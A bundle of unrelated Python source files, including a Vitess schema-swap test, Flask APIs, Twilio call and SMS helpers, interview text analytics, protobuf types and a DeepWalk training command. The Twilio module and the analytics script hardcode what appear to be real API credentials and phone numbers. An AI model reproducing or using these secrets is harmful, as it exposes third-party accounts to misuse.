cls._start_tablets('80-',
[shard_1_master, shard_1_replica],
[shard_1_rdonly])
for t in all_tablets:
t.wait_for_vttablet_state('NOT_SERVING')
utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/-80',
shard_0_master.tablet_alias], auto_log=True)
utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/80-',
shard_1_master.tablet_alias], auto_log=True)
utils.run_vtctl(['RebuildKeyspaceGraph', 'test_keyspace'], auto_log=True)
for t in all_tablets:
t.wait_for_vttablet_state('SERVING')
@classmethod
def _start_tablets(cls, shard_name, replica_tablets, rdonly_tablets):
"""Start all tablets on a shard.
Args:
shard_name: string, name of the shard passed to the tablet.
replica_tablets: list of tablet.Tablet, list of tablets that should be
started as replica.
rdonly_tablets: list of tablet.Tablet, list of tablets that should be
started as rdonly.
"""
for t in replica_tablets:
t.start_vttablet(wait_for_state=None,
init_tablet_type='replica',
init_keyspace='test_keyspace',
init_shard=shard_name,
extra_args=utils.vtctld.process_args())
for t in rdonly_tablets:
t.start_vttablet(wait_for_state=None,
init_tablet_type='rdonly',
init_keyspace='test_keyspace',
init_shard=shard_name,
extra_args=utils.vtctld.process_args())
create_table_sql = ('DROP TABLE IF EXISTS test; '
'CREATE TABLE test (id int, PRIMARY KEY(id)) '
'Engine=InnoDB')
schema_swap_sql = 'ALTER TABLE test ADD COLUMN (t TEXT)'
show_schema_sql = 'SHOW CREATE TABLE test'
schema_check_string = '`t` text,'
def _check_final_schema(self):
"""Check that schema of test table is correct after a successful swap."""
schema_0 = shard_0_master.mquery('vt_test_keyspace',
self.show_schema_sql)[0][1]
schema_1 = shard_1_master.mquery('vt_test_keyspace',
self.show_schema_sql)[0][1]
self.assertEqual(schema_0, schema_1)
self.assertIn(self.schema_check_string, schema_0)
def setUp(self):
utils.run_vtctl(['ApplySchema',
'-sql=%s' % self.create_table_sql,
'test_keyspace'],
auto_log=True)
for t in [shard_0_master, shard_1_master]:
tablet_info = utils.run_vtctl_json(['GetTablet', t.tablet_alias])
if tablet_info['type'] != topodata_pb2.MASTER:
utils.run_vtctl(['InitShardMaster', '-force',
'test_keyspace/' + t.shard, t.tablet_alias],
auto_log=True)
tablet_info = utils.run_vtctl_json(['GetTablet', t.tablet_alias])
self.assertEqual(tablet_info['type'], topodata_pb2.MASTER)
t.mquery('_vt', "DELETE FROM shard_metadata where name in ("
"'LastStartedSchemaSwap','LastFinishedSchemaSwap',"
"'CurrentSchemaSwapSQL');"
"DELETE FROM local_metadata "
"where name = 'LastAppliedSchemaSwap';")
self._vtctld_url = 'http://localhost:%d' % utils.vtctld.port
self._wait_for_functional_vtctld()
self._start_vtctld_long_poll()
def _start_swap(self, sql):
"""Start a new schema swap with the given SQL statement."""
self._swap_error = None
vtctl_res = utils.run_vtctl(['WorkflowCreate',
'schema_swap',
'-keyspace=test_keyspace',
'-sql=%s' % sql],
auto_log=True)
m = re.match(r'^uuid: (.*)$', vtctl_res[0])
return m.group(1)
def _stop_swap(self, swap_uuid):
"""Stop the running schema swap with the given uuid."""
utils.run_vtctl(['WorkflowStop', swap_uuid], auto_log=True)
def _delete_swap(self, swap_uuid):
"""Delete the schema swap with the given uuid."""
utils.run_vtctl(['WorkflowDelete', swap_uuid], auto_log=True)
def _fetch_json_from_vtctld(self, url_path):
"""Fetch and deserialize a json object from vtctld.
Args:
url_path: string, a path appended to vtctld address to create a URL that
is used to fetch json object from.
Returns:
deserialized json object returned from vtctld.
"""
full_url = '%s/%s' % (self._vtctld_url, url_path)
f = urllib2.urlopen(full_url)
res_json = f.read()
f.close()
return json.loads(res_json)
def _start_vtctld_long_poll(self):
"""Start long polling of workflow updates from vtctld."""
poll_update = self._fetch_json_from_vtctld('api/workflow/create')
self._poll_id = poll_update['index']
return poll_update
def _wait_for_functional_vtctld(self):
"""Wait until vtctld is fully up and is able to respond to polls."""
while True:
try:
poll_update = self._fetch_json_from_vtctld('api/workflow/create')
if poll_update.get('index') is None:
time.sleep(0.1)
continue
break
except urllib2.HTTPError:
pass
def _send_retry_vtctld_action(self, swap_uuid):
"""Emulate click of the Retry button on the schema swap."""
req = urllib2.Request('%s/api/workflow/action/%s' %
(self._vtctld_url, self._poll_id))
req.add_header('Content-Type', 'application/json; charset=utf-8')
resp = urllib2.urlopen(req, '{"path":"/%s","name":"Retry"}' % swap_uuid)
logging.info('Retry response code: %r', resp.getcode())
def _strip_logs_from_nodes(self, nodes):
"""Strip all the logs from the node hierarchy."""
for node in nodes:
if node.get('log'):
del node['log']
if node.get('children'):
self._strip_logs_from_nodes(node['children'])
def _poll_vtctld(self):
"""Do one poll of vtctld for updates to workflow UI.
If for any reason the poll breaks the method tries to restart the long
polling.
Returns:
deserialized json object that came from vtctld as the result of poll. Can
be an incremental or a full update.
"""
try:
poll_update = self._fetch_json_from_vtctld('api/workflow/poll/%s' %
self._poll_id)
except urllib2.HTTPError as e:
logging.info('Error polling vtctld, will try to re-create the long poll: '
'%s', e)
poll_update = self._start_vtctld_long_poll()
if poll_update.get('nodes'):
# Log contents in the nodes is very big and makes our test logs very hard
# to read without bringing any new information (the history of actions is
# already present in test logs through the logging of incremental polls
# that is done here). Because of that we are stripping all the log
# contents from the nodes hierarchy.
self._strip_logs_from_nodes(poll_update['nodes'])
logging.info('Workflow polling update: %r', poll_update)
return poll_update
def _has_swap_done_or_error(self, nodes, swap_uuid):
"""Check if the node list has root node of the swap that is finished.
Args:
nodes: list, list of nodes that came in an update from vtctld.
swap_uuid: string, uuid of the swap to look for.
Returns:
bool, whether the list of nodes had the root node for the swap and the
swap was finished. When True is returned self._swap_error will contain
the error or success message displayed in the swap root node.
"""
for node in nodes:
if node['pathName'] == swap_uuid:
if node['actions'] or node['state'] == 2:
# Button Retry appeared or state is 'Done'. Then the 'message' will
# have the error.
self._swap_error = node['message']
return True
# Other nodes are not interesting.
break
return False
def _wait_for_success_or_error(self, swap_uuid, reset_error=False):
"""Wait until schema swap finishes successfully or with error.
Args:
swap_uuid: string, uuid of the schema swap to wait for.
reset_error: bool, should be set to True when the swap already had an
error and we need to wait for the next one.
Returns:
string, error or success message displayed on the schema swap.
"""
if reset_error:
self._swap_error = None
# Error can have been seen already during execution of
# _wait_for_progress_message().
if self._swap_error is not None:
return self._swap_error
while True:
poll_update = self._poll_vtctld()
if not poll_update.get('nodes'):
continue
if self._has_swap_done_or_error(poll_update['nodes'], swap_uuid):
return self._swap_error
def _has_progress_message(self, nodes, message):
"""Check if any node in the hierarchy has the given progress message."""
for node in nodes:
if node.get('progressMsg') == message:
return True
children = node.get('children')
if children and self._has_progress_message(children, message):
return True
return False
def _wait_for_progress_message(self, swap_uuid, message):
"""Wait until at least one node has the given progress message.
The method returns when some node has the given progress message or when
the given swap has finished successfully or with an error. The latter is
necessary to not wait forever if the swap finishes without ever having the
given progress message.
Args:
swap_uuid: string, uuid of the swap being waited for.
message: string, progress message to wait for.
"""
while True:
poll_update = self._poll_vtctld()
if not poll_update.get('nodes'):
continue
if self._has_progress_message(poll_update['nodes'], message):
return
if self._has_swap_done_or_error(poll_update['nodes'], swap_uuid):
return
def test_successful_swap(self):
"""Normal swap running from start to finish, "happy path"."""
swap_uuid = self._start_swap(self.schema_swap_sql)
err = self._wait_for_success_or_error(swap_uuid)
self.assertEqual(err, 'Schema swap is finished')
self._check_final_schema()
self._delete_swap(swap_uuid)
def test_restarted_swap(self):
"""Force a restart of schema swap in the middle."""
swap_uuid = self._start_swap(self.schema_swap_sql)
# Wait until at least one tablet has the new schema (the progress message is
# '1/3') and then forcefully stop the swap.
self._wait_for_progress_message(swap_uuid, '1/3')
self._stop_swap(swap_uuid)
err = self._wait_for_success_or_error(swap_uuid)
self.assertIn('context canceled', err)
self._delete_swap(swap_uuid)
# While we are at it try to start new swap with a different SQL statement.
# The swap should fail.
swap_uuid = self._start_swap('ALTER TABLE test ADD COLUMN i int')
err = self._wait_for_success_or_error(swap_uuid)
self.assertIn('different set of SQL statements', err)
self._stop_swap(swap_uuid)
self._delete_swap(swap_uuid)
# Now restart with the correct statement and should succeed.
swap_uuid = self._start_swap(self.schema_swap_sql)
err = self._wait_for_success_or_error(swap_uuid)
self.assertEqual(err, 'Schema swap is finished')
self._check_final_schema()
self._delete_swap(swap_uuid)
def _retry_or_restart_swap(self, swap_uuid, use_retry):
"""Click Retry button on the swap or fully restart it.
Args:
swap_uuid: string, uuid of the schema swap to restart.
use_retry: bool, if True then Retry button is clicked, if False then the
swap is restarted completely as a new workflow.
Returns:
string, uuid of the new swap if it's restarted, or swap_uuid if the swap
was retried.
"""
if use_retry:
self._send_retry_vtctld_action(swap_uuid)
else:
self._stop_swap(swap_uuid)
self._delete_swap(swap_uuid)
swap_uuid = self._start_swap(self.schema_swap_sql)
return swap_uuid
def _test_init_error(self, use_retry):
"""Schema swap interrupted by an error during initialization."""
# By marking the master read-only we cause an error when schema swap tries
# to write shard metadata during initialization.
shard_1_master.mquery('', 'SET GLOBAL read_only = 1')
swap_uuid = self._start_swap(self.schema_swap_sql)
err = self._wait_for_success_or_error(swap_uuid)
self.assertIn('running with the --read-only option', err)
shard_1_master.mquery('', 'SET GLOBAL read_only = 0')
swap_uuid = self._retry_or_restart_swap(swap_uuid, use_retry=use_retry)
err = self._wait_for_success_or_error(swap_uuid, reset_error=True)
self.assertEqual(err, 'Schema swap is finished')
self._check_final_schema()
self._delete_swap(swap_uuid)
def test_init_error_with_retry(self):
self._test_init_error(use_retry=True)
def test_init_error_with_restart(self):
self._test_init_error(use_retry=False)
def _test_apply_error(self, use_retry):
"""Schema swap interrupted while applying seed schema change."""
# Renaming the test table to cause ALTER TABLE executed during schema swap
# to fail.
shard_1_master.mquery('vt_test_keyspace', 'RENAME TABLE test TO test2')
swap_uuid = self._start_swap(self.schema_swap_sql)
err = self._wait_for_success_or_error(swap_uuid)
self.assertIn("Table 'vt_test_keyspace.test' doesn't exist", err)
shard_1_master.mquery('vt_test_keyspace', 'RENAME TABLE test2 TO test')
swap_uuid = self._retry_or_restart_swap(swap_uuid, use_retry=use_retry)
err = self._wait_for_success_or_error(swap_uuid, reset_error=True)
self.assertEqual(err, 'Schema swap is finished')
self._check_final_schema()
self._delete_swap(swap_uuid)
def test_apply_error_with_retry(self):
self._test_apply_error(use_retry=True)
def test_apply_error_with_restart(self):
self._test_apply_error(use_retry=False)
def _restart_vtctld(self, extra_flags):
"""Restart vtctld possibly passing it some additional flags.
The method makes sure that restarted vtctld has the same listening port as
the one that was before.
Args:
extra_flags: list of strings, list of additional flags to pass to vtctld
"""
vtctld_port = utils.vtctld.port
utils.vtctld.proc.terminate()
utils.vtctld.proc.wait()
utils.vtctld = None
new_vtctld = utils.Vtctld()
new_vtctld.port = vtctld_port
new_vtctld.start(extra_flags=extra_flags)
self._wait_for_functional_vtctld()
def test_reparent_error(self):
"""Schema swap interrupted by an error during reparent."""
# With -disable_active_reparents and without 'reparent_away' hook on
# vttablet the attempt to reparent during schema swap will always fail.
self._restart_vtctld(extra_flags=['-disable_active_reparents'])
swap_uuid = self._start_swap(self.schema_swap_sql)
err = self._wait_for_success_or_error(swap_uuid)
self.assertIn("Error executing 'reparent_away'", err)
self._restart_vtctld(extra_flags=[])
# We don't need to restart the swap here because it's automatically
# restarted by vtctld when it's started.
err = self._wait_for_success_or_error(swap_uuid, reset_error=True)
self.assertEqual(err, 'Schema swap is finished')
self._check_final_schema()
self._delete_swap(swap_uuid)
if __name__ == '__main__':
utils.main()
|
"Iris Controller"
from flask import abort, jsonify, request, current_app
from flask_accepts import responds, accepts
from flask_praetorian import roles_required
from flask_restplus import Namespace, Resource
from app import api, guard
from app.models import User
from app.services.iris_service import IrisClf
iris_api = Namespace("Iris", description="Iris API")
# Preferably this automatically goes to a data source and gets an already
# trained classifier with prediction capabilities instead of having to manually train
# the model every time the app starts up
iris_clf = IrisClf()
@iris_api.route("/train")
@iris_api.doc(security="jwt")
class IrisTrainResource(Resource):
def get(self):
return iris_clf.train_iris_model()
@iris_api.route("/query")
@iris_api.doc(security="jwt")
class IrisTrainResource(Resource):
@accepts(
dict(name="sep_length", type=float, required=True),
dict(name="sep_width", type=float, required=True),
dict(name="pet_length", type=float, required=True),
dict(name="pet_width", type=float, required=True),
api=api,
)
def get(self):
X = [
[
request.parsed_args["sep_length"],
request.parsed_args["sep_width"],
request.parsed_args["pet_length"],
request.parsed_args["pet_width"],
]
]
return iris_clf.query_clf(X)[0]
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
from twilio.rest import TwilioRestClient
from lib.constants import BASE_URL
import requests
account_sid = "AC564a7022d50ef41d59bb316ec4f0aabd" # Your Account SID from www.twilio.com/console
auth_token = "ebecd1386153ef898ff84afeb8f7b1c4" # Your Auth Token from www.twilio.com/console
base_url = "https://api.twilio.com"
client = TwilioRestClient(account_sid, auth_token)
def send_url_sms(interview_id):
client.messages.create(
to="+16073388347",
from_="+13232714335",
body="Your interview analysis is available at " + BASE_URL + "/interviews/" + str(interview_id) + "/stats",
)
def init_call(url, to, interview_id):
call = client.calls.create(url=url, to=to, from_="+13232714335",
record=True, method="GET",
recording_status_callback=BASE_URL + "/interviews/" + interview_id + "/actions/fetch_recordings",
recording_status_callback_method="POST",
recording_status_events=["completed"])
return call.sid
def fetch_recordings(call_sid):
recording_url = base_url + "/2010-04-01/Accounts/%s/Calls/%s/Recordings.json" % (account_sid, call_sid)
r = requests.get(recording_url, auth=(account_sid, auth_token))
recording_json = r.json()
recordings = []
for record in recording_json['recordings']:
if record['source'] != 'RecordVerb':
continue
recording = {}
recording['url'] = base_url + record['uri'][:-5]
rec = client.recordings.get(record['sid'])
for t in rec.transcriptions.list():
recording['text'] = t.transcription_text
recordings.append(recording)
return recordings
import json
import language_check
from os.path import join, dirname
from watson_developer_cloud import AlchemyLanguageV1
fillers = ['like', 'umm', 'ah', 'you know', 'ok so']
tool = language_check.LanguageTool('en-US')
def execute(raw):
num_filler_words = 0
num_grammatical_errors = 0
raw_sections = raw
sections = raw_sections['sections']
result = '''
{
"sections": [
'''
for i in range(0, len(sections)):
section = sections[i]
question = section['question']
response = section['response']
result += '''
{
"question":"'''+question+'''",
"response":"'''+response+'''",
'''
sentences = response.split('.')
new_response = ''
result += '''
"grammatical_errors": [
'''
for sentence in sentences:
sentence = sentence.strip()
# num_filler_words_in_response = 0
for filler_word in fillers:
if filler_word in sentence:
num_filler_words += 1
# num_filler_words_in_response += 1
sentence.replace(filler_word, '')
new_response += sentence + '. '
grammer_matches = tool.check(sentence)
if len(grammer_matches) > 0:
result += '''
{
'''
num_grammatical_errors += len(grammer_matches)
result += '''
"errors": [
'''
for i in range(0, len(grammer_matches)):
result += '''
{
"suggestion":"'''+grammer_matches[i].msg+'''",
"replacements":"'''+''.join(grammer_matches[i].replacements)+'''"
}
'''
if i < len(grammer_matches) - 1:
result += ','
result += '''
],
"sentence":"'''+sentence+'''",
"corrected":"'''+language_check.correct(sentence.strip(), grammer_matches)+'''"
}
'''
result += '''
],
'''
raw_text_analytics = getTextAnalytics(new_response)
score = '0'
try:
score = raw_text_analytics['docSentiment']['score']
except:
pass
result += '''
"response_sentiment": {
"score": "'''+score+'''",
"type": "'''+raw_text_analytics['docSentiment']['type']+'''"
},
"emotions": {
"anger": "'''+raw_text_analytics['docEmotions']['anger']+'''",
"joy": "'''+raw_text_analytics['docEmotions']['joy']+'''",
"fear": "'''+raw_text_analytics['docEmotions']['fear']+'''",
"sadness": "'''+raw_text_analytics['docEmotions']['sadness']+'''",
"disgust": "'''+raw_text_analytics['docEmotions']['disgust']+'''"
}
'''
result += '''
}
'''
if i < len(sections) - 1:
result += ','
result += '''
],
"stats": {
"num_filler_words": '''+str(num_filler_words)+''',
"num_grammatical_errors": '''+str(num_grammatical_errors)+'''
}
}
'''
return json.loads(result)
# return result.encode('ascii', 'ignore').decode('ascii')
def getTextAnalytics(text):
alchemy_language = AlchemyLanguageV1(api_key='2a244174a9a41c43e449cf387a107093e50bdd64')
combined_operations = ['entity', 'keyword', 'concept', 'doc-emotion', 'doc-sentiment']
return alchemy_language.combined(text=text, extract=combined_operations)
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package='google.cloud.aiplatform.v1',
manifest={
'Event',
},
)
class Event(proto.Message):
r"""An edge describing the relationship between an Artifact and
an Execution in a lineage graph.
Attributes:
artifact (str):
Required. The relative resource name of the
Artifact in the Event.
execution (str):
Output only. The relative resource name of
the Execution in the Event.
event_time (google.protobuf.timestamp_pb2.Timestamp):
Output only. Time the Event occurred.
type_ (google.cloud.aiplatform_v1.types.Event.Type):
Required. The type of the Event.
labels (Sequence[google.cloud.aiplatform_v1.types.Event.LabelsEntry]):
The labels with user-defined metadata to
annotate Events.
Label keys and values can be no longer than 64
characters (Unicode codepoints), can only
contain lowercase letters, numeric characters,
underscores and dashes. International characters
are allowed. No more than 64 user labels can be
associated with one Event (System labels are
excluded).
See https://goo.gl/xmQnxf for more information
and examples of labels. System reserved label
keys are prefixed with
"aiplatform.googleapis.com/" and are immutable.
"""
class Type(proto.Enum):
r"""Describes whether an Event's Artifact is the Execution's
input or output.
"""
TYPE_UNSPECIFIED = 0
INPUT = 1
OUTPUT = 2
artifact = proto.Field(
proto.STRING,
number=1,
)
execution = proto.Field(
proto.STRING,
number=2,
)
event_time = proto.Field(
proto.MESSAGE,
number=3,
message=timestamp_pb2.Timestamp,
)
type_ = proto.Field(
proto.ENUM,
number=4,
enum=Type,
)
labels = proto.MapField(
proto.STRING,
proto.STRING,
number=5,
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
model_config = {
'vae_mid': 20,
'num_words': 35285,
'vocab_size': 35285,
'bow_mid_hid': 512,
'seq_mid_hid': 512,
'seq_len': 100,
'num_heads': 8,
'dropout': 1,
'is_traing': True
}
data_config = {
'data_path': 'data/data.bin',
'vocabulary_path': 'data/vocabulary.json',
'stop_words_path': 'data/stop_words'
}
train_config = {
'batch_size': 2000,
'epochs': 1000,
'lr': 3e-3,
'clip_grad': 20,
'save_step' : 100,
'checkpoint_path': 'checkpoint/'
}
eval_config = {
'batch_size': 1000,
}
|
from typing import List, Tuple
from blspy import AugSchemeMPL
from clvm import KEYWORD_FROM_ATOM
from clvm_tools.binutils import disassemble as bu_disassemble
from sector.types.blockchain_format.coin import Coin
from sector.types.blockchain_format.program import Program, INFINITE_COST
from sector.types.blockchain_format.sized_bytes import bytes32
from sector.types.condition_opcodes import ConditionOpcode
from sector.util.condition_tools import conditions_dict_for_solution, pkm_pairs_for_conditions_dict
from sector.util.hash import std_hash
CONDITIONS = dict((k, bytes(v)[0]) for k, v in ConditionOpcode.__members__.items()) # pylint: disable=E1101
KFA = {v: k for k, v in CONDITIONS.items()}
# information needed to spend a cc
# if we ever support more genesis conditions, like a re-issuable coin,
# we may need also to save the `genesis_coin_mod` or its hash
def disassemble(sexp):
"""
This version of `disassemble` also disassembles condition opcodes like `ASSERT_ANNOUNCEMENT_CONSUMED`.
"""
kfa = dict(KEYWORD_FROM_ATOM)
kfa.update((Program.to(k).as_atom(), v) for k, v in KFA.items())
return bu_disassemble(sexp, kfa)
def coin_as_program(coin: Coin) -> Program:
"""
Convenience function for when putting `coin_info` into a solution.
"""
return Program.to([coin.parent_coin_info, coin.puzzle_hash, coin.amount])
def dump_coin(coin: Coin) -> str:
return disassemble(coin_as_program(coin))
def debug_spend_bundle(spend_bundle, agg_sig_additional_data=bytes([3] * 32)) -> None:
"""
Print a lot of useful information about a `SpendBundle` that might help with debugging
its clvm.
"""
pks = []
msgs = []
created_coin_announcements: List[List[bytes]] = []
asserted_coin_announcements = []
created_puzzle_announcements: List[List[bytes]] = []
asserted_puzzle_announcements = []
print("=" * 80)
for coin_solution in spend_bundle.coin_solutions:
coin = coin_solution.coin
puzzle_reveal = Program.from_bytes(bytes(coin_solution.puzzle_reveal))
solution = Program.from_bytes(bytes(coin_solution.solution))
coin_name = coin.name()
if puzzle_reveal.get_tree_hash() != coin_solution.coin.puzzle_hash:
print("*** BAD PUZZLE REVEAL")
print(f"{puzzle_reveal.get_tree_hash().hex()} vs {coin_solution.coin.puzzle_hash.hex()}")
print("*" * 80)
breakpoint()
continue
print(f"consuming coin {dump_coin(coin)}")
print(f" with id {coin_name}")
print()
print(f"\nbrun -y main.sym '{bu_disassemble(puzzle_reveal)}' '{bu_disassemble(solution)}'")
error, conditions, cost = conditions_dict_for_solution(puzzle_reveal, solution, INFINITE_COST)
if error:
print(f"*** error {error}")
elif conditions is not None:
for pk, m in pkm_pairs_for_conditions_dict(conditions, coin_name, agg_sig_additional_data):
pks.append(pk)
msgs.append(m)
print()
cost, r = puzzle_reveal.run_with_cost(INFINITE_COST, solution) # type: ignore
print(disassemble(r))
print()
if conditions and len(conditions) > 0:
print("grouped conditions:")
for condition_programs in conditions.values():
print()
for c in condition_programs:
if len(c.vars) == 1:
as_prog = Program.to([c.opcode, c.vars[0]])
if len(c.vars) == 2:
as_prog = Program.to([c.opcode, c.vars[0], c.vars[1]])
print(f" {disassemble(as_prog)}")
created_coin_announcements.extend(
[coin_name] + _.vars for _ in conditions.get(ConditionOpcode.CREATE_COIN_ANNOUNCEMENT, [])
)
asserted_coin_announcements.extend(
[_.vars[0].hex() for _ in conditions.get(ConditionOpcode.ASSERT_COIN_ANNOUNCEMENT, [])]
)
created_puzzle_announcements.extend(
[puzzle_reveal.get_tree_hash()] + _.vars
for _ in conditions.get(ConditionOpcode.CREATE_PUZZLE_ANNOUNCEMENT, [])
)
asserted_puzzle_announcements.extend(
[_.vars[0].hex() for _ in conditions.get(ConditionOpcode.ASSERT_PUZZLE_ANNOUNCEMENT, [])]
)
print()
else:
print("(no output conditions generated)")
print()
print("-------")
created = set(spend_bundle.additions())
spent = set(spend_bundle.removals())
zero_coin_set = set(coin.name() for coin in created if coin.amount == 0)
ephemeral = created.intersection(spent)
created.difference_update(ephemeral)
spent.difference_update(ephemeral)
print()
print("spent coins")
for coin in sorted(spent, key=lambda _: _.name()):
print(f" {dump_coin(coin)}")
print(f" => spent coin id {coin.name()}")
print()
print("created coins")
for coin in sorted(created, key=lambda _: _.name()):
print(f" {dump_coin(coin)}")
print(f" => created coin id {coin.name()}")
if ephemeral:
print()
print("ephemeral coins")
for coin in sorted(ephemeral, key=lambda _: _.name()):
print(f" {dump_coin(coin)}")
print(f" => created coin id {coin.name()}")
created_coin_announcement_pairs = [(_, std_hash(b"".join(_)).hex()) for _ in created_coin_announcements]
if created_coin_announcement_pairs:
print("created coin announcements")
for announcement, hashed in sorted(created_coin_announcement_pairs, key=lambda _: _[-1]):
as_hex = [f"0x{_.hex()}" for _ in announcement]
print(f" {as_hex} =>\n {hashed}")
eor_coin_announcements = sorted(
set(_[-1] for _ in created_coin_announcement_pairs) ^ set(asserted_coin_announcements)
)
created_puzzle_announcement_pairs = [(_, std_hash(b"".join(_)).hex()) for _ in created_puzzle_announcements]
if created_puzzle_announcements:
print("created puzzle announcements")
for announcement, hashed in sorted(created_puzzle_announcement_pairs, key=lambda _: _[-1]):
as_hex = [f"0x{_.hex()}" for _ in announcement]
print(f" {as_hex} =>\n {hashed}")
eor_puzzle_announcements = sorted(
set(_[-1] for _ in created_puzzle_announcement_pairs) ^ set(asserted_puzzle_announcements)
)
print()
print()
print(f"zero_coin_set = {sorted(zero_coin_set)}")
print()
if created_coin_announcement_pairs or asserted_coin_announcements:
print(f"created coin announcements = {sorted([_[-1] for _ in created_coin_announcement_pairs])}")
print()
print(f"asserted coin announcements = {sorted(asserted_coin_announcements)}")
print()
print(f"symdiff of coin announcements = {sorted(eor_coin_announcements)}")
print()
if created_puzzle_announcement_pairs or asserted_puzzle_announcements:
print(f"created puzzle announcements = {sorted([_[-1] for _ in created_puzzle_announcement_pairs])}")
print()
print(f"asserted puzzle announcements = {sorted(asserted_puzzle_announcements)}")
print()
print(f"symdiff of puzzle announcements = {sorted(eor_puzzle_announcements)}")
print()
print()
print("=" * 80)
print()
validates = AugSchemeMPL.aggregate_verify(pks, msgs, spend_bundle.aggregated_signature)
print(f"aggregated signature check pass: {validates}")
print(f"pks: {pks}")
print(f"msgs: {[msg.hex() for msg in msgs]}")
print(f" msg_data: {[msg.hex()[:-128] for msg in msgs]}")
print(f" coin_ids: {[msg.hex()[-128:-64] for msg in msgs]}")
print(f" add_data: {[msg.hex()[-64:] for msg in msgs]}")
print(f"signature: {spend_bundle.aggregated_signature}")
def solution_for_pay_to_any(puzzle_hash_amount_pairs: Tuple[bytes32, int]) -> Program:
output_conditions = [
[ConditionOpcode.CREATE_COIN, puzzle_hash, amount] for puzzle_hash, amount in puzzle_hash_amount_pairs
]
return Program.to(output_conditions)
|
import signal
import logging
import os
import shutil
import csv
import json
import datetime
import pickle
import gensim
import subprocess
import traceback
import networkx as nx
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from rdflib.namespace import split_uri
from api.rdf.namespace import find_type
from os import listdir
from os.path import isfile, join, splitext, exists
from api.training.generate_graph import *
from api.training.evaluator import *
logger = logging.getLogger(__name__)
logging.getLogger('pykeen').setLevel(logging.INFO)
KGE_DIR = getattr(settings, 'KGE_DIR', None)
TRAINING_SET_DIR = getattr(settings, 'TRAINING_SET_DIR', None)
TEST_SET_DIR = getattr(settings, 'TEST_SET_DIR', None)
class Command(BaseCommand):
help = 'Training kg data using deepwalk'
def add_arguments(self, parser):
parser.add_argument('-m', '--model', type=str, default='sg', help='Preferred word2vec architecture, sg or cbow', )
parser.add_argument('-d', '--representation_size', type=int, default=128, help='Computed vector dimensions', )
parser.add_argument('-w', '--workers', type=int, default=30, help='Number of worker threads while training', )
parser.add_argument('-wl', '--walk_length', type=int, default=40, help='Random walk length', )
parser.add_argument('-n', '--number_walks', type=int, default=80, help='Number of walks', )
parser.add_argument('-s', '--window_size', type=int, default=10, help='Window size', )
parser.add_argument('-tn', '--testset_name', type=str, default='', help='testset name', )
parser.add_argument('-e', '--exp_name', type=str, default='', help='experiment name', )
parser.add_argument('-dg', '--directed', nargs='?', const=True, default=False, help='directed or undirected graph by default the graph is undirected', )
def handle(self, *args, **options):
model = options['model']
representation_size = options['representation_size']
workers = options['workers']
walk_length = options['walk_length']
number_walks = options['number_walks']
window_size = options['window_size']
testset_name = options['testset_name']
directed = options['directed']
exp_name = options['exp_name']
try:
annontation_files = [join(TRAINING_SET_DIR, file) for file in os.listdir(TRAINING_SET_DIR + '/.') if (file) and ('nt' in splitext(file)[1])]
axiom_files = [join(TRAINING_SET_DIR, file) for file in os.listdir(TRAINING_SET_DIR + '/.') if (file) and ('.ls' in splitext(file)[1])]
outdir = join(KGE_DIR, 'deepwalkrdf' + '-' + testset_name + '-' + (exp_name + '-' if exp_name else '') + str(datetime.date.today()))
os.makedirs(outdir, exist_ok=True)
os.chdir(outdir)
config = {
'trainingset': annontation_files,
'axiom_files': axiom_files,
'model': 'deepwalkrdf',
'output_directory': outdir,
'representation_size': representation_size,
'walk_length': walk_length,
'number_walks': number_walks,
'window_size': window_size,
'workers': workers,
'testset_name': testset_name,
'directed': directed,
}
logger.info("Starting training dataset with settings:" + str(config))
(graph, node_dict) = generate_deepwalk_graph(annontation_files, axiom_files)
if directed:
graph = graph.to_directed()
edgelist_outfile = "kb.edgelist"
nx.write_edgelist(graph, edgelist_outfile, data=False)
self.write_nodes_file(node_dict)
CMD = f'deepwalk --input {edgelist_outfile} --output karate.embeddings --workers {workers} \
--number-walks {number_walks} --representation-size {representation_size} --walk-length {walk_length} --window-size {window_size}'
process = subprocess.Popen(CMD, text=True, shell=True)
if process.wait() != 0:
exit(0)
self.generate_bio2vec_frmt(node_dict, outdir)
run_evaluation(outdir, join(TEST_SET_DIR, testset_name + '.tsv'), testset_name)
except Exception as e:
logger.exception("message")
except RuntimeError:
logger.exception("message")
def generate_bio2vec_frmt(self, node_dict, outdir):
logger.info("Started generating bio2vec dataset file")
id2node_map = dict((v, k) for k, v in node_dict.items())
sep = ','
entity_emb_file = "karate.embeddings"
outFile = join(outdir, "embeddings.bio2vec.tsv")
with open(join(outdir, entity_emb_file), "r") as emb_file:
csv_reader = csv.reader(emb_file, delimiter=' ', )
next(csv_reader)
with open(outFile, 'w') as file:
writer = csv.writer(file, delimiter='\t')
for row in csv_reader:
key = id2node_map[int(row[0])]
local_name = ''
entity_type = 'entity'
try:
uri = key[1:len(key) -1]
entity_type = find_type(uri)
key = uri
local_name = split_uri(uri)[1]
except Exception:
pass
row =[key, local_name, '', '', entity_type, sep.join(map(str, row[1:len(row)]))]
writer.writerow(row)
logger.info("Finished generating bio2vec dataset file")
def write_nodes_file(self, node_dict):
node_file = open("nodes.json", "w")
json.dump(node_dict, node_file, indent=4)
node_file.close()
|
#!/usr/bin/env python3
from flask import render_template, request, make_response, jsonify
from app import app
from app.mongo import mongodb
from . import admin
@admin.route('/setting', methods=['GET'])
def basicset_index():
collection = app.config.get('BASICSET_COLLECTION')
setting = mongodb[collection].find_one({"usageTag":"blog_setting"})
if setting:
blog_title = setting.get('blog_title')
blog_keywords = setting.get('blog_keywords')
blog_description = setting.get('blog_description')
blog_tag = setting.get('blog_tag')
return render_template('setting/index.html')
|
import tensorflow as tf
import tensorflow.keras as keras
def alexnet(input_shape, classes_num=100):
"""
AlexNet:
Described in: http://arxiv.org/pdf/1404.5997v2.pdf
